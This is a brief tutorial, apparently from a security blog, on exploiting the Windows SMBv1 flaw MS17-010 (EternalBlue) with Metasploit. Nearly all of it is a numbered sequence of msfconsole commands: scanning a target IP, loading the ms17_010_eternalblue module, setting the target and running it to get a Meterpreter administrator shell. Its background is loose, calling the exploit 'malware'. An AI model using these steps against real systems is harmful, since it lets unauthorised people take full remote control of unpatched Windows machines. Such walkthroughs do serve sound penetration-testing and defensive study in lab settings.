EternalBlue Malware Developed by National Security Agency (NSA) exploiting Windows based Server Message Block (SMBv1) and to be believed the tool has released by Shadow Brokers hackers Group and it has been used for Wannacry Cyber Attack.
we will be exploiting a SMB vulnerability using the Eternalblue exploit which is one of the exploits and this vulnerability existed with windows os which leads to perform Remote Code Execution which was particularly targeted Windows 7 and XP.
It assumes that you already have MetaSploit installed, or that you are running Kali / backtrack Linux. if not Installed,you can download from here https://www.metasploit.com/
Step 1 : Open MetaSploit by using command msfconsole
Step 2 :
Search eternalblue
Step 3 :
msf >use auxiliary/scanner/smb/smb_ms17_010
options
Step 4 : Type command msfconsole
set rhosts 192.168.18.129 [Target I.P]
Step 5 : run
Step 6 :
use exploit/windows/smb/ms17_010_eternalblue
options
Step 7 :
set rhost 192.168.18.129 [Target I.P]
Step 8 : run
Step 9 :
A meterpreter session open!
We now have a full Meterpreter Admin Privilledge shell to the target.